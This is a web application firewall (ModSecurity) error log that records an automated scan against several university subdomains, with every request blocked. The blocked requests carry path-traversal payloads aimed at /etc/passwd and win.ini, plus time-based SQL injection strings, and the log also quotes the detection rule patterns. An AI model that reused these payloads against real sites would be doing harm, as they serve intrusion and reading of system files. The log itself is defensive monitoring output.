[Tue Aug 29 11:48:49.374962 2023] [:error] [pid 2438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14scCo-f0AAAmG@p4AAAAy"]
[Tue Aug 29 11:48:49.377656 2023] [:error] [pid 2350] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14scCo-f0AAAku@l8AAAAQ"]
[Tue Aug 29 11:48:49.379066 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14scCo-f0AAAkoTlUAAAAH"]
[Tue Aug 29 11:48:49.379288 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14scCo-f0AAAk1w8AAAAAY"]
[Tue Aug 29 11:48:49.385690 2023] [:error] [pid 2378] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14scCo-f0AAAlK-50AAAAp"]
[Tue Aug 29 11:48:49.398767 2023] [:error] [pid 2438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14scCo-f0AAAmG@p8AAAAy"]
[Tue Aug 29 11:48:49.416041 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14scCo-f0AAAlkwhoAAAAO"]
[Tue Aug 29 11:48:49.420792 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14scCo-f0AAAlIBZoAAAAn"]
[Tue Aug 29 11:48:49.421254 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14scCo-f0AAAk1w8EAAAAY"]
[Tue Aug 29 11:48:49.425305 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14scCo-f0AAAkwQS4AAAAS"]
[Tue Aug 29 11:48:49.425612 2023] [:error] [pid 2383] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14scCo-f0AAAlPmuwAAAAv"]
[Tue Aug 29 11:48:49.427790 2023] [:error] [pid 2428] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14scCo-f0AAAl8pQEAAAAm"]
[Tue Aug 29 11:48:49.445425 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14scCo-f0AAAkoTlcAAAAH"]
[Tue Aug 29 11:48:50.361500 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ssCo-f0AAAkoTlgAAAAH"]
[Tue Aug 29 11:48:50.361684 2023] [:error] [pid 2353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14ssCo-f0AAAkxFy0AAAAV"]
[Tue Aug 29 11:48:50.400017 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14ssCo-f0AAAkwQTAAAAAS"]
[Tue Aug 29 11:48:50.405452 2023] [:error] [pid 2383] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14ssCo-f0AAAlPmu0AAAAv"]
[Tue Aug 29 11:48:50.411631 2023] [:error] [pid 2358] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14ssCo-f0AAAk2KY8AAAAb"]
[Tue Aug 29 11:48:50.415533 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14ssCo-f0AAAkqHtwAAAAM"]
[Tue Aug 29 11:48:50.427702 2023] [:error] [pid 2379] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14ssCo-f0AAAlL7C4AAAAq"]
[Tue Aug 29 11:48:51.398493 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14s8Co-f0AAAlkwh4AAAAO"]
[Tue Aug 29 11:48:51.405519 2023] [:error] [pid 2418] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14s8Co-f0AAAlyrBkAAAAI"]
[Tue Aug 29 11:48:51.407011 2023] [:error] [pid 2414] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14s8Co-f0AAAluT1wAAAAe"]
[Tue Aug 29 11:48:51.410381 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14s8Co-f0AAAlUlfsAAAA0"]
[Tue Aug 29 11:48:51.413426 2023] [:error] [pid 2373] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14s8Co-f0AAAlFH7MAAAAk"]
[Tue Aug 29 11:48:52.367370 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tMCo-f0AAAlQ3sEAAAAw"]
[Tue Aug 29 11:48:52.406235 2023] [:error] [pid 2408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tMCo-f0AAAlo0zkAAAAJ"]
[Tue Aug 29 11:48:52.435459 2023] [:error] [pid 2348] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14tMCo-f0AAAksktoAAAAN"]
[Tue Aug 29 11:48:52.436062 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tMCo-f0AAAkAMKkAAAAU"]
[Tue Aug 29 11:48:52.437129 2023] [:error] [pid 2408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tMCo-f0AAAlo0zoAAAAJ"]
[Tue Aug 29 11:48:52.452452 2023] [:error] [pid 2381] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tMCo-f0AAAlNqtIAAAAt"]
[Tue Aug 29 11:48:53.361421 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tcCo-f0AAAkyx-sAAAAW"]
